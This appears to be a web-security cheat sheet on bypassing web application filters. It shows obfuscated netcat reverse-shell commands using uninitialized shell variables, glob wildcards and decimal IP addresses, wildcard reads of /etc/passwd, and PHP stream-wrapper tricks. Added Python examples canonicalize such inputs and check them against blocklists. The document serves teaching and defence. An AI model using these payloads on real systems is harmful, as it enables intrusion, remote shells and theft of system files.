Web Filter Bypass
Uninitialized shell variables can be used to bypass web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell: nc$u -e /bin$u/bash$u <ip> <port>
If this doesn't work, try adding spaces before and after the variable (note the +'s; this example is also URL-encoded): nc+$u++-e+/bin$u/bash$u <ip> <port>
($u in this case is a random attacker-picked variable that would hopefully be uninitialized on the target.)
Bypass web filters by using bash wildcards, e.g. /???/?s
A request such as /?cmd=%2f???%2f??t%20%2f???%2fp??s?? (decoded: /???/??t /???/p??s??) will bypass the filter and execute every command that matches the pattern, such as /bin/cat /etc/apt and /bin/cat /etc/passwd
netcat firewall bypass: /???/n? -e /???/b??h 2130706433 1337
(or /???/?c.??????????? -e /???/b??h 2130706433 1337 for nc traditional)
Injecting IPs when the . character is disallowed: convert the dotted-decimal address to its decimal value (e.g. with ip2dh). An address written in decimal is still understood by most programs and languages and avoids the . character in filtered HTTP requests: 127.0.0.1 = 2130706433
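The three tricks above (uninitialized variables, ? wildcards, and decimal IPs) all defeat a filter that matches raw strings. The defensive answer is to canonicalize the input before matching. The following is an added example, not code from the original page or from any real WAF: it URL-decodes a parameter, drops $var references, expands glob tokens against an assumed inventory of host paths, rewrites all-digit IPv4 values back to dotted form, and only then consults a blocklist. The KNOWN_PATHS inventory, the BLOCKLIST, and the sample inputs are constructed for this demo.

```python
"""Canonicalize a suspected command-injection string before matching.

Added example (not from the original page). Each normalizer undoes one
of the bypasses the page lists:
  - strip uninitialized-variable references such as nc$u
  - expand bash-style ? / * wildcards against a known path list
  - rewrite pure-decimal IPv4 addresses (2130706433) to dotted form
KNOWN_PATHS and BLOCKLIST are assumptions for the demo, not real rules.
"""
import fnmatch
import ipaddress
import re
from urllib.parse import unquote_plus

# Assumed inventory of paths a wildcard could expand to on the target host.
KNOWN_PATHS = [
    "/bin/sh", "/bin/bash", "/bin/cat", "/bin/nc", "/bin/nc.traditional",
    "/etc/passwd", "/etc/shadow", "/etc/apt",
]

# Assumed blocklist of canonical tokens the filter wants to stop.
BLOCKLIST = {
    "/bin/nc", "/bin/nc.traditional", "/bin/bash", "/bin/sh",
    "/etc/passwd", "/etc/shadow", "127.0.0.1",
}

VAR_REF = re.compile(r"\$\{?[A-Za-z_][A-Za-z0-9_]*\}?")
DECIMAL_IP = re.compile(r"\d{8,10}")


def strip_shell_vars(s: str) -> str:
    """Drop $var references: an uninitialized variable expands to nothing.

    A filter cannot know which variables are set on the target, so the
    conservative choice is to evaluate every reference as empty.
    """
    return VAR_REF.sub("", s)


def expand_wildcards(token: str, paths=KNOWN_PATHS) -> list:
    """Return every known path a glob-style token matches, else the token itself."""
    if any(c in token for c in "?*["):
        hits = [p for p in paths if fnmatch.fnmatchcase(p, token)]
        return hits or [token]
    return [token]


def decimal_to_dotted(token: str) -> str:
    """Rewrite an all-digit IPv4 value to dotted form; leave other tokens alone."""
    if DECIMAL_IP.fullmatch(token):
        try:
            return str(ipaddress.IPv4Address(int(token)))
        except ValueError:  # above 2**32-1: not an address
            pass
    return token


def canonicalize(raw: str) -> list:
    """URL-decode, remove variable refs, split, expand globs, decode IPs."""
    text = strip_shell_vars(unquote_plus(raw))
    out = []
    for tok in text.split():
        for t in expand_wildcards(tok):
            out.append(decimal_to_dotted(t))
    return out


def matches_blocklist(raw: str) -> set:
    """Canonical tokens from `raw` that hit the blocklist (empty set = clean)."""
    return {t for t in canonicalize(raw) if t in BLOCKLIST}


if __name__ == "__main__":
    for sample in ("nc+$u++-e+/bin$u/bash$u",
                   "%2f???%2f??t%20%2f???%2fp??s??",
                   "/???/n? -e /???/b??h 2130706433 1337"):
        print(sample, "->", canonicalize(sample), matches_blocklist(sample))
```

Note that the wildcard expansion reports every path the pattern could hit, which is exactly why the page's /???/??t example reaches both /bin/cat and /etc/apt; a real filter would feed it the host's actual binary inventory rather than the assumed list.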
From PayloadsAllTheThings: php://filter/ has multiple ways to bypass PHP input filters. These can be chained with | or /. Other wrappers: zip, data, expect, input, phar; there are many more wrappers to try!
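Because a php://filter chain can be spelled with either | or / between filters, a rule that only looks for one spelling is easy to miss. The following is an added example, not code from the page or from PayloadsAllTheThings: it parses a suspected include/fopen parameter, normalizes the filter chain to a list regardless of separator, and rejects any stream wrapper from an assumed dangerous set (the ones the page names plus a few other standard PHP wrappers). The ALLOWED_RESOURCES allowlist and the sample values are constructed for the demo.

```python
"""Parse PHP stream-wrapper syntax in an include/fopen parameter and
decide whether an input filter should reject it.

Added example (not from the original page). DANGEROUS_WRAPPERS and
ALLOWED_RESOURCES are assumptions made for this demo.
"""
import re
from urllib.parse import unquote

# Wrappers named on the page (zip, data, expect, input via php://, phar)
# plus other standard PHP wrappers that read local or remote data.
DANGEROUS_WRAPPERS = {
    "php", "zip", "data", "expect", "phar",
    "file", "glob", "compress.zlib", "ftp", "http", "https",
}
ALLOWED_RESOURCES = {"home.php", "about.php"}  # assumed include allowlist

SCHEME = re.compile(r"^([a-z][a-z0-9.+-]*)://(.*)$", re.IGNORECASE | re.DOTALL)


def parse_wrapper(value: str):
    """Return (wrapper, rest) for 'scheme://rest', or (None, value) when plain.

    The value is URL-decoded first so %70hp:// is seen as php://.
    """
    v = unquote(value)
    m = SCHEME.match(v)
    if not m:
        return None, v
    return m.group(1).lower(), m.group(2)


def parse_php_filter(rest: str):
    """Split 'filter/<chain>/resource=<target>' into (filters, resource).

    The chain may use '/' or '|' between filters; both are normalized.
    'read=' / 'write=' prefixes are stripped so the filter name is kept.
    """
    body = rest[len("filter"):].lstrip("/")
    chain, sep, resource = body.partition("resource=")
    filters = []
    for part in re.split(r"[|/]", chain):
        if not part:
            continue
        if part.lower().startswith(("read=", "write=")):
            part = part.split("=", 1)[1]
        filters.append(part)
    return filters, (resource if sep else None)


def assess(value: str) -> dict:
    """Classify a parameter: plain names must be allowlisted; wrappers are
    blocked when in DANGEROUS_WRAPPERS, with php://filter chains expanded
    so a log line shows exactly which filters were requested."""
    wrapper, rest = parse_wrapper(value)
    if wrapper is None:
        return {"wrapper": None, "filters": [], "resource": rest,
                "block": rest not in ALLOWED_RESOURCES}
    filters, resource = [], rest
    if wrapper == "php" and rest.lower().startswith("filter"):
        filters, resource = parse_php_filter(rest)
    return {"wrapper": wrapper, "filters": filters, "resource": resource,
            "block": wrapper in DANGEROUS_WRAPPERS}


if __name__ == "__main__":
    for v in ("home.php",
              "php://filter/convert.base64-encode/resource=index.php",
              "php://filter/read=convert.base64-encode|string.rot13/resource=index.php",
              "%70hp://input"):
        print(v, "->", assess(v))
```

The useful output for a defender is the normalized filters list: two requests that differ only in | versus / produce the same record, so detection rules and alert deduplication work on the canonical form rather than the raw string.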